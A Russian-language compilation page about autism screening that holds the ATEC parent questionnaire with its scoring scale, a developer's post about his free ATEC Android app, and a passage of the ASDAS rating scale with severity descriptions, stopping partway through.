Тест атек пройти онлайн: Диагностический тест, позволяющий самостоятельно отслеживать динамику развития ребенка — РОО помощи детям с РАС «Контакт»

Содержание

Диагностический тест, позволяющий самостоятельно отслеживать динамику развития ребенка — РОО помощи детям с РАС «Контакт»

 

Тест на Аутизм АТЕК для оценки динамики и выявления проблем

Тест на Аутизм, АТЕК, используется для оценки динамики улучшений детей с аутизмом. Подсчет баллов автоматический.

I. Речь/Язык/Коммуникативные навыки

1. Знает собственное имя:ДаИногдаНет2. Реагирует на ‘нет’ или ‘стоп’:ДаИногдаНет
3. Может выполнять некоторые команды:ДаИногдаНет4. Может сказать одно слово:ДаИногдаНет
5. Может сказать 2 слова подряд:ДаИногдаНет6. Может сказать 3 слова подряд:ДаИногдаНет
7. Знает 10 или больше слов:ДаИногдаНет8. Использует в речи предложения из 4 и более слов:ДаИногдаНет
9. Объясняет, что он/она хочет:ДаИногдаНет10. Задает осмысленные вопросы:ДаИногдаНет
11. Речь чаще всего осмысленна/логична:ДаИногдаНет12. Часто использует предложения, выстроен-ные в логической последовательности:ДаИногдаНет
13. Поддерживает разговор:ДаИногдаНет14. Имеет нормальные коммуникативные навыки для своего возраста:ДаИногдаНет

II. Социализация

1. Кажется, что находится в раковине – вы не можете достучаться до него/нее:ДаИногдаНет2. Игнорирует других людей:ДаИногдаНет
3. Практически не обращает внимание, если к нему/к ней обращаются:ДаИногдаНет4. Не склонен к совместной деятельности:ДаИногдаНет
5. Зрительный контакт отсутствует:ДаИногдаНет6. Предпочитает оставаться в одиночестве:ДаИногдаНет
7. Не проявляет привязанности:ДаИногдаНет8. Не здоровается с родителями:ДаИногдаНет
9. Избегает контактов с окружающими:ДаИногдаНет10.
Имитация отсутствует:ДаИногдаНет
11. Не любит прикосновений/объятий:ДаИногдаНет12. Не делится, указательный жест отсутствует:ДаИногдаНет
13. Не машет рукой `до свидания`:ДаИногдаНет14. Непослушный/непокладистый:ДаИногдаНет
15. Испытывает приступы гнева, раздражительности:ДаИногдаНет16. Недостаток друзей/нет компании:ДаИногдаНет
17. Редко улыбается:ДаИногдаНет18. Не понимает чувств других людей:ДаИногдаНет
19. Безразличен, если ему выражают симпатию:ДаИногдаНет20. Не реагирует на уход родителей:ДаИногдаНет

III. Сенсорные навыки/Познавательные способности

1. Откликается на собственное имя:ДаИногдаНет2. Реагирует на похвалу:ДаИногдаНет
3. Смотрит на людей и животных:ДаИногдаНет4. Смотрит на картинки (и телевизор):ДаИногдаНет
5. Умеет рисовать, раскрашивать, мастерить:ДаИногдаНет6. Правильно играет с игрушками:ДаИногдаНет
7. Выражение лица соответствует ситуации:ДаИногдаНет8. Понимает происходящее на телеэкране:ДаИногдаНет
9. Понимает объяснения:ДаИногдаНет10. Осознает окружающую среду:ДаИногдаНет
11. Осознает опасность:ДаИногдаНет12. Проявляет воображение:ДаИногдаНет
13. Проявляет инициативу:ДаИногдаНет14. Умеет самостоятельно одеваться:ДаИногдаНет
15. Проявляет любопытство, заинтересованность:ДаИногдаНет16. Смелый — исследует окружающее:ДаИногдаНет
17. Адекватно воспринимает окружающее, не уходит в себя:ДаИногдаНет18. Смотрит туда, куда смотрят другие:ДаИногдаНет

IV. Здоровье/Физическое развитие/Поведение

1. Ночное недержание мочи:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема2. Мочится в штаны/памперсы:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
3. Какает в штаны/памперсы:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема4. Поносы:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
5. Запоры:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема6. Проблемы со сном:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
7. Ест слишком много/слишком мало:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема8. Ест очень ограниченный набор продуктов:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
9. Гиперактивность:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема10. Аппатия:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
11. Бьет или ранит сам себя:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема12. Бьет или ранит сам других:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
13. Ломает и разбрасывает все вокруг:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема14. Чувствительность к звукам:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
15. Тревожность/страх:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема16. Подавленность/слезы:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
17. Припадки:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема 18. Навязчивая речь:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
19. Неизменный порядок действий:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема20. Вопли и крики:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
21. Потребность в однообразии:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема22. Постоянная возбужденность:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
23. Нечувствительность к боли:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема24. Концентрация на определенных предметах/темах:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема
25. Повторяющиеся движения:Не проблемаЛегкая проблемаСредняя проблемаСерьезная проблема

Шкала результатов:

  • 10-15 не аутичный ребенок, полностью нормальный, хорошо развитый ребенок
  • 16–30 не аутичный ребенок, небольшие отклонения в сторону задержки развития
  • 31-40 мягкая или умеренная степень аутизма
  • 41-60 средняя степень аутизма
  • 61 и выше тяжелый аутизм

Тест АТЕК не является диагностическим тестом, а служит для оценки динамики. Тест не предназначен для подтверждения наличия аутизма, для точной постановки диагноза необходимо обратиться к специалистам.

ATEC — приложение для проверки признаков аутизма — Трибуна на vc.ru

Бесплатное приложение на Android для родителей детей с аутизмом и специалистов, занимающихся с такими детьми.

37 757 просмотров

Здравствуйте! Меня зовут Захар, я дизайнер интерфейсов и отец девочки с аутизмом.

Захар Лобанов

Чтобы помочь другим родителям детей с РАС, я сделал бесплатное мобильное приложение под Android на трёх языках: русском, английском, испанском.

Для чего это приложение

У моей дочери атипичный аутизм был официально диагностирован только в четыре года.

Хотя первые звоночки, что с ребёнком что-то не так, начались гораздо раньше, лет с полутора: пропала только-только появившаяся речь, исчез зрительный контакт, появились повторяющиеся навязчивые движения, раскладывание предметов в линию, истерики, ухудшилось поведение и прочее.

Если бы в то время мне было известно, что это весьма тревожные признаки, а не просто детские закидоны, меры по реабилитации были бы начаты гораздо раньше и нынешнее состояние дочери было бы лучше.

Но тогда я не знал, как оценить масштаб бедствия. Мой врождённый оптимизм, помноженный на русское авось, и мысль «с моим ребёнком такого случиться не может, это не аутизм» только помешали начать действовать вовремя.

Плюс мнения некоторых врачей «само пройдёт, дайте ей гречки поперебирать, пусть мелкую моторику прокачивает» и «до пяти лет никто вам диагноз не поставит, не выдумывайте» тоже повлияли.

Чем раньше родители поймут, что с их ребёнком что-то не так, тем больше времени и шансов у них будет на удачную реабилитацию ребёнка и приведение его к состоянию, максимально близкому к его достижимой норме.

Это приложение поможет сомневающимся родителям либо развеять их опасения, либо подтвердить. И если опасения небеспочвенны, поможет следить за динамикой реабилитации.

Откуда ты взял вопросы для теста

Существует сайт американского Института исследования аутизма. На нём доступен онлайн-тест АТЕС. Autism Treatment Evaluation Checklist (чеклист лечения аутизма). Он прекрасно работает на сайте в десктопной версии на разных языках, но у него нет мобильной версии.

Учитывая, что половина людей в мире заходят в интернет с мобильных устройств, я предположил, что стоит сделать приложение.

Спросил у Института исследования аутизма, не против ли они.

Ответа не дождался и решил действовать с учётом условия полной бесплатности приложения, ибо, как написано на сайте autism.org: «The Autism Treatment Evaluation Checklist (ATEC) may be used only for non-commercial purposes»

Что считать тревожным симптомом

Что считать нормой или просто детскими закидонами, а что является тревожным симптомом? В тесте ATEC 77 вопросов, разбитых по четырём разделам:

  1. Речь, язык, коммуникативные навыки.
  2. Социализация.
  3. Сенсорные навыки, познавательные способности.
  4. Здоровье, физическое развитие, поведение.

​Разделы теста

Эти 77 вопросов про ребёнка и содержат в себе перечень того, что может быть симптомом. Примеры вопросов:

  • «Может сказать три слова подряд («хочу ещё молока»)».
  • «Не любит прикосновений или объятий».
  • «Не делится впечатлениями, указательный жест отсутствует».
  • «Выражение лица соответствует ситуации».
  • «Смотрит туда же, куда и все».
  • «Чувствительность к звукам».

Варианты ответа позволяют дать вашу оценку серьёзности означенной проблемы по трём-четырём градациям — от «проблема отсутствует» до «серьёзная проблема».

​Варианты ответа на вопрос из четвертого раздела

Как работает приложение

Проходишь все четыре раздела по очереди (занимает минут пять-семь), отвечаешь на все вопросы о своём ребёнке и видишь итоговые баллы. Чем меньше баллов, тем лучше.

Границы по баллам примерно такие:

  • Меньше 15 баллов — ребёнок в порядке.
  • От 16 до 30 баллов — лёгкая степень аутизма.
  • От 31 до 40 — умеренная степень.
  • От 41 до 60 — средняя степень.
  • 61 и выше — тяжёлый аутизм.

Например, в 2014 году по результатам онлайн-теста ATEC у дочи было 63 балла. Результаты через несколько месяцев комплексной реабилитации в 2015 году — 45 баллов. Прогресс был заметен как по баллам, так и вживую.

Для сохранения истории баллов приложению нужно предоставить доступ к хранилищу телефона. Где-то же оно должно хранить все предыдущие результаты тестов? Хранит прямо на телефоне. Плюс для загрузки фотографии ребёнка приложению требуется доступ к камере.

В данный момент поддерживается три языка (русский, английский, испанский). Приложение смотрит на язык телефона и выдаёт информацию на нём. Если язык незнаком, показывает всё на английском.

Для детей младше двух лет результаты теста будут некорректны. Например, не стоит ожидать от полуторалетки умения говорить фразы из четырёх слов.

Что умеет приложение

  • Сохранять результаты тестов в таблицу отдельно для каждого ребёнка.
  • Строить график динамики за выбранный период.
  • Считать и показывать средний балл за день.
  • Вести учёт по нескольким детям. В основном эта фича для специалистов, которые занимаются не с одним ребёнком, им может пригодиться отслеживание прогресса.

График строится как по общим баллам, так и по каждому из четырёх разделов по отдельности. Можно оценить, насколько хороша (или плоха) динамика в целом или, например, только по социализации.

Пример экрана результатов: это макет, баллы и даты на нём не соответствуют графику, нет аватарки ребёнка. Я столько раз удалял и переустанавливал приложение во время сотрудничества с мобильным разработчиком, что на моём телефоне нет данных для красивого графика.

Для более точных результатов лучше, чтобы оба родителя проходили тест, потому как у всех разная степень оптимизма и взглядов на то, что считать серьёзной проблемой, а что нет.

Соответственно, будут немного разные ответы на один и тот же вопрос и немного разное количество баллов. Приложение посчитает средний балл за день, в котором было несколько тестирований.

Что делать с результатами

Если регулярно проводить тестирование, можно наблюдать динамику в реабилитации ребёнка. И понимать, помогают выбранные способы реабилитации или что-то нужно поменять.

Внимание! Это приложение не служит для постановки медицинского диагноза из серии F84. Пусть диагнозами занимаются специально обученные люди с медицинским образованием. Приложение предназначено для родителей и терапистов. Оно помогает оценить вероятность наличия аутистических признаков и эффективность реабилитации.

Если ваши опасения насчёт ребёнка подтверждаются результатами теста (набрано больше 15–20 баллов), не паникуйте, но и не закрывайте на это глаза. Обратитесь к специалистам в профильные центры по работе с детьми с РАС (расстройствами аутистического спектра) в вашем городе для консультации.

Немного статистики

На основе нынешних 3000 установок в Google Play:

  • Больше всего пользователей, которые устанавливают приложение, из России (почти половина). И они же чаще всего удаляют его вскоре после установки.
  • Второе место внезапно делят между собой страны Южной Америки, почти поровну: Чили, Мексика, Аргентина. Однако суммарно активных испаноязычных пользователей в полтора раза больше, чем российских.
  • Украина, США, Индонезия и Казахстан занимают третье место по количеству установок.

Что будешь делать со статистикой

Вся информация по детям и набранным баллам по-прежнему хранится на вашем телефоне, никуда не отправляется и никак не анализируется. Когда будет больше статистики, можно будет её обезличенно (для параноиков типа меня повторю — обезличенно) анализировать в привязке к географии и возрасту. Там могут быть неожиданные открытия.

Какие ещё открытия

Например, есть интересные исследования на autism.org, что в не-англоговорящих странах дети быстрее реабилитируются, чем в англоговорящих.

Для любознательных ссылка на исследование-первоисточник, страница пятая.

Удивительно, но в сравнении с англоговорящими нациями (США, Канада, Великобритания, Ирландия, Австралия, Новая Зеландия) не-англоговорящие нации показали значительно больший прогресс по общим баллам теста и по всем разделам…

За два года занятий дети в англоговорящих странах в среднем показали улучшения, уменьшив результаты на 16,7 балла, а в не-англоговорящих — на 21,58 балла.

Shreyas Mahapatra, Edward Khokhlovich, Samantha Martinez, Benjamin Kannel, Stephen M. Edelson, Andrey Vyshedskiy, Journal of Autism and Developmental Disorders

Surprisingly, a comparison of developed English-speaking nations (the United States, Canada, United Kingdom, Ireland, Australia, and New Zealand) to non-English-speaking countries demonstrated greater improvements in ATEC total score and all subscales in the non-English-speaking nations. … Over the period of 2 years the participants in the English-speaking nations group improved by 16.70 units (SE = 0.80, p < 0.0001), and non-English-speaking nations group improved by 21.58 units (SE = 0.70, p < 0.0001).

оригинальный текст

Обратите внимание. Разница в эффективности реабилитации более чем на 20% на контрольных группах численностью около 1000 человек.

Возможно, в дальнейшем обнаружится ещё какая-то статистическая информация, которая поможет в исследованиях аутизма.

Вместо послесловия

Недавно мне написала учительница из Португалии.

Boa tarde!

Meu nome é (думаю, не стоит светить имя без разрешения), sou professora. Baixei o aplicativo ATEC, mas não consegui utilizar. Não sei inglês e tentei alterar o idioma, mas não consegui. Acredito que este aplicativo muito me ajudará.

Agradeço desde já e aguardo um retorno.

Até mais!

учительница из Португалии

Она сказала, что приложение ей может пригодиться в работе с учениками, но она не знает английского, и спрашивала, как переключить приложение на португальский язык. Я посоветовал переключить телефон на испанский, это сработало — испанский для португальцев понятен, примерно как белорусский для русских. Она поблагодарила и попросила рассмотреть возможность добавления других языков.

И я добавил в список «Сделать позже» португальскую локализацию к немецкой и французской. Оказывается, в интернете 3,9% пользователей говорят на португальском.

Спасибо, что прочли. Будет здорово, если вы расскажете об этом приложении знакомым и друзьям, столкнувшимся с проблемой аутизма.

Страница приложения в Google Play.

ASDAS | Autistic City


I. Раздел «Трудности социального взаимодействия».

Социальные нарушения являются одним из основополагающих аспектов аутизма, синдрома Аспергера и атипичного аутизма.

Нет — Норма.

Преодолено — Ранее имелись проявления, но теперь совершенно нормальные социальные навыки.

Не ярко выражено — Люди (или дети), кажущиеся почти нормальными во взаимодействии с другими, но имеющие некоторые тонкие проявления «странного поведения» или неспособность «читать» социальные сигналы. Например, не понимают, когда они наскучивают другим, постоянно говорят об одном и том же предмете или думают, что другие люди хотят того же, что и они, тогда как окружающим очевидно, что это не так (часто высмеиваются).

Умеренно выражено — Значительные, очень заметные проблемы взаимодействия. Может быть заинтересованным в социальном взаимодействии, но будет выглядеть неловко, очень застенчивым, или эксцентричным. Может стоять слишком близко во время разговора, трогать других не к месту, или говорить не соотвествующим ситуации тоном (социально изолированы, имеют очень мало друзей).

Резко выражено — Нет заинтересованности во взаимодействии, кажется раздраженным или тревожным при социальных контактах, Для детей возраста от 1 до 3 лет может проявляться в желании играть самостоятельно, крике, истериках, расстроенном состоянии из-за окружения другими детьми.

1. Плохой зрительный контакт или необычный взгляд.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормальный зрительный контакт, но манера взгляда на других людей несколько необычна. Это может встречаться у детей с атипичным аутизмом, у которых глазной контакт сначала плохой, а потом со временем улучшается.

Умеренно выражено — Зрительный контакт может наблюдаться на протяжении длительного периода времени, но явно не нормален: ребенок может слишком долго пялиться на одну точку, казаться «очень застенчивым» или смотреть искоса.

Резко выражено — Почти никогда не способен установить глазной контакт. Когда зрительный контакт появляется, то он очень кратковременный и явно не нормален.

2. Игнорирует зов, не откликается, не поворачивает голову на звук голоса.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — В настоящее время нормальная реакция на зов, но ранее были проявления особенностей.

Не ярко выражено — Почти нормально откликается на зов по имени, но имеется незначительная задержка в реагировании, заметная на фоне других людей.

Умеренно выражено — Значительные аномалии в реагировании на зов, отклики единичны.

Резко выражено — Практически никогда не отзывается на свое имя, но при любимых, даже тихих, звуках (музыка, видео игры) реакция моментальная.

3. Чрезмерная боязнь звуков (пылесос), часто затыкает уши.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Изредка, но более чем обычно, беспокоят звуки.

Умеренно выражено — Частое беспокоят звуки.

Резко выражено — Неспособность терпеть определенные звуки, закрытие ушей, истерики при непереносимых звуках.

4. Отстраненность, пребывание «в собственном мире».

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Изредка отстранен, это заметно, но обычно почти нормальное взаимодействие с внешним миром.

Умеренно выражено — Часто отстранен, пребывает «в себе».

Резко выражено — Постоянная отстраненность, пребывание «в себе», вряд ли способен взаимодействоввать с внешним миром.

5. Отсутствие интереса к окружающему.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редкие эпизоды очевидной отстраненности, обычно почти нормальный уровень интереса.

Умеренно выражено — Значительное, очевидное отсутствие интереса.

Резко выражено — Полное отсутствие интереса к людям, событиям, ситуациям. Абсолютное игнорирование любых шумов, кроме раздражающих звуков.

6. Мимика не соответствует ситуации.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но обнаруживаются едва заметные несоответствия.

Умеренно выражено — Часто выражение лица не соответствует ситуации.

Резко выражено — Не в состоянии интерпретировать ситуацию и придать лицу соответствующее выражение. Часто улыбается без причины или имеет безэмоциональное лицо.

7. Неуместные слезы или смех.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Крайне редко.

Умеренно выражено — Иногда.

Резко выражено — Часто.

8. Закатывает продолжительную истерику, когда что-то делают не так, как хочет.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редкие приступы гнева.

Умеренно выражено — Частые истерики, которые прекращаются, если уступить требованиям (не рекомендуется).

Резко выражено — Частые, не подконтрольные истерики, происходящие при изменении деятельности или просьбе поучаствовать в ситуации (остановка игры или обеда).

9. Игнорирование боли (нет реакции на удары головой).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормальная реакция, но сниженный болевой порог.

Умеренно выражено — Изредка игнорирует боль («забывает» плакать при ударе головой).

Резко выражено — Практически никогда реагирует на боль.

10. Не нравятся прикосновения (к волосам, к телу, к голове).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, разрешает себя трогать, но выражает дискомфорт или недовольство от тактильного контакта.

Умеренно выражено — Очевидно избегает прикосновений, но без истерик.

Резко выражено — Полная нетерпимость прикосновений к волосам, коже, голове. Может проявлять гнев, агрессию в ответ на попытки прикосновений.

11. Ненавидит толпу, сложности во время пребывания в магазинах, кафе, местах общественного пользования.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но бывают эпизоды истерик и острых реакций в людных местах.

Умеренно выражено — Часто имеет трудности при пребывании в людных местах, очень чувствителен, но иногда способен перетерпеть ситуацию.

Резко выражено — Пребывание в людных местах практически исключено, сопровождается истериками и приступами гнева. Страх выхода из дома.

12. Неуместный страх, тревога.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Более тревожен чем обычный человек.

Умеренно выражено — Часто тревожен, но можно успокоить.

Резко выражено — Выраженный страх относительно разных ситуаций. Наличие фобий к шуму (гром), звукам (пылесос), предметам, животным, ошибкам, людям, ведущих к тяжелым истерикам и неконтролируемому поведению.

13. Несоответствующая эмоциональная реакция («тормозит»).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но есть уловимые отличия.

Умеренно выражено — Частые неуместные эмоциональные отклики.

Резко выражено — Никогда не выказывает любую соответствующую эмоциональную реакцию. Когда родители протягивают руки, чтобы взять ребенка, он не понимает, что нужно поднять руки, чтобы облегчить их задачу.

14. Аномалии выражении радости при виде родителей.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, редкие эпизоды неуместности.

Умеренно выражено — Может выйти навстречу пришедшим домой родителям, но реакция радости не всегда проявляется.

Резко выражено — Никогда не выражает радость, когда ожидают. Игнорирует приход родителей домой.

15. Отсутствие способности к имитации.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но отчетливо видны некоторые тонкие ограничения в способности подражать.

Умеренно выражено — Ограниченные возможности в подражании.

Резко выражено — Абсолютно не имеют возможности подражать в отличие от других детей, которые во время игры подражают друг другу или дразнятся, чтобы быть «крутыми» или в качестве шутки (это часть социальной ситуации).


II. Раздел «Речь и задержка языкового развития».

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно в норме, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но возникали некоторые сложности в понимании речи (слов).

Умеренно выражено — Значительная задержка речевого развития (40-70% от необходимого навыка для возраста)

Резко выражено — Невербальность или отдельные взрослые слова. Если диагностируется маленький ребенок (1-4 года), то оценка может производиться медиками или специалистами по поведению.

1. Утрата речевого навыка.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Не применимо.

Не ярко выражено — Прекратил использовать некоторые слова.

Умеренно выражено — Прекратил использовать многие слова из тех, которыми говорил ранее.

Резко выражено — Говорил много слов, но стал невербальным.

2. Производит необычные шумы или детский визг.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Иногда, но чаще чем другие.

Умеренно выражено — Очень часто.

Резко выражено — Нет других звуков кроме скрежета и визга.

3. Голос звучит громче чем нужно.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Иногда звук голоса явно не соответствует норме.

Умеренно выражено — Голос часто звучит ненормально.

Резко выражено — Голос постоянно очень громкий (или тихий как шепот), никогда не звучит правильно.

4. Невнятная речь (тарабарщина) или жаргонизмы.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Часто.

Резко выражено — Почти постоянно неразборчивая речь; звуки, имитирующие речь. Но не могут сказать ничего, что может быть понято окружающими. Возможно пытаются воспроизвести звуки из телевизионных передач и т.п.

5. Трудности в понимании очевидного («как можно этого не понять?»).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Едва заметные трудности в понимании. не схватывает суть шуток «на лету».

Умеренно выражено — Значительно выраженная неспособность понимать абстрактные вещи.

Резко выражено — Полное отсутствие понимания.

6. Дергает родителей, привлекая их внимание, когда что-то хочет

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Иногда.

Умеренно выражено — Часто.

Резко выражено — Почти всегда тянет родителей в сторону того, что его заинтересовало, сдвигает их с места, толкает. Способ коммуникации.

7. Сложности с выражением потребностей, использование жестов вместо слов.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Иногда использует жесты.

Умеренно выражено — Часто использует жесты.

Резко выражено — Всегда выражает с помощью жестов, никогда речью.

8. Спонтанная инициация речи или коммуникации.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись трудности.

Не ярко выражено — Почти нормально, но есть застенчивость и нерешительность при инициативе социального взаимодействия.

Умеренно выражено — Редко инициирует.

Резко выражено — Никогда не инициирует.

9. Повторяет услышанные слова, части слов, слоганы из ТВ роликов.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Часто.

Резко выражено — Почти всегда повторяет части услышанных слов или фразы за говорящими.

10. Повторяющаяся речь (одно и то же слово или фраза повторяется снова и снова).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Иногда.

Резко выражено — Часто (или непрерывно) и бессвязно повторяет слова, фразы, предложения или целые сюжеты из контекста социальной ситуации.

11. Неспособность поддержать беседу.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Незначительные сложности.

Умеренно выражено — Значительные трудности в поддержании разговора.

Резко выражено — Совершенно не в состоянии инициировать разговор или ответить на предложение в рамках беседы.

12. Монотонная речь, ошибочные паузы.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Едва заметные проявления.

Умеренно выражено — Значительные трудности в речи.

Резко выражено — Роботоподобная речь, невозможно понять начало и/или окончание предложения.

13. Не делает различий про общении с детьми, взрослыми, при разговорах о предметах.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Едва заметные проявления.

Умеренно выражено — Очевидные проявления.

Резко выражено — Полное отсутствие способности регулировать тон, темп или интенсивности речи в зависимости от конкретной ситуации.

14. Неправильное использование слов, фраз, ошибки в речи.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Едва заметные трудности, очень редко использует неправильные слова или фразы.

Умеренно выражено — Редкие ошибки в речи, но очевидные.

Резко выражено — Очень часто использует не то слово, фразу или неправильно выражение, полностью вырванное из контекста.


III. Раздел «Аномалии символической или воображаемой игры».

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Обычно нормально играют, но есть незначительные трудности с воображением и творческим подходом к процессу игры.

Умеренно выражено — Может проявлять заинтересованность в игрушках, но явно неправильно и ненормально их использует (не понимает, что можно кормить куклу), не использует воображение, не делает вид, что играет.

Резко выражено — Нет интереса к игрушкам, соответствующим возрасту. Если и заинтересован в чем-либо, то может бить предмет, вращать, раскладывать по порядку.

1. Хлопание руками, кручение пальцами (самостимуляция).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Часто, особенно при возбуждении, когда расстроен, нервничает

Резко выражено — Почти постоянно занимается стимулирующими действиями, часто взмахивает руками, словно пытаясь летать, крутит пальцами, в том числе используя какой-либо объект.

2. Битье головой.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко бьется головой.

Умеренно выражено — Иногда стучится головой обо что-либо, особенно в состоянии гнева или когда расстроен.

Резко выражено — Часто стучит головой о твердые поверхности.

3. Самоповреждение, причинение боли.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Изредка причиняет себе боль, в основном когда расстроен или взволнован.

Резко выражено — Представляет опасность для самого себя, нужно часто контролировать, чтобы предотвратить укусы, удары по собственному лицу или причинение ущерба каким-либо другим способом.

4. Ходьба с опором на носок, неуклюжесть во владении телом.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко.

Умеренно выражено — Часто.

Резко выражено — Почти всегда подскакивает при ходьбе, неуклюжая координация в настоящее время (пример: неумение крутить педали трехколесного велосипеда до 4-5 лет, связанное с проблемами в координации движений).

5. Расположение игрушек рядами, по линии.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко располагает предметы рядами.

Умеренно выражено — Часто располагает предметы по рядам, такая форма игры.

Резко выражено — Часто располагает предметы или игрушки рядами по определенным схемам, очень расстраивается и устраивает истерику, если картина нарушается.

6. Обнюхивание, стучание, облизывание или иное нецелевое использование игрушек.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормальный навык игры, но изредка странно использует предметы и игрушки.

Умеренно выражено — Часто необычно использует предметы или игрушки, путается в навыках игры.

Резко выражено — Никогда не использует игрушки по назначению, может облизывать, обнюхивать, вращать, стучать ими.

7. Интерес к частям игрушек, например к колесам машин.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко зацикливается на отдельных частях игрушки.

Умеренно выражено — Может играть с игрушками правильно, но часто внимание смещается на детали игрушек, многократно манипулирует ими.

Резко выражено — Очень часто взаимодействует именно с отдельной частью игрушки (не видит всю картину). Никогда не использует игрушку как задумано.

8. Одержимость предметами или темами (поезда, погода, номера, даты).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко, но очевидна одержимость идеями вне контекста.

Умеренно выражено — Часто проявляет одержимость одними и те ми же предметами или темами.

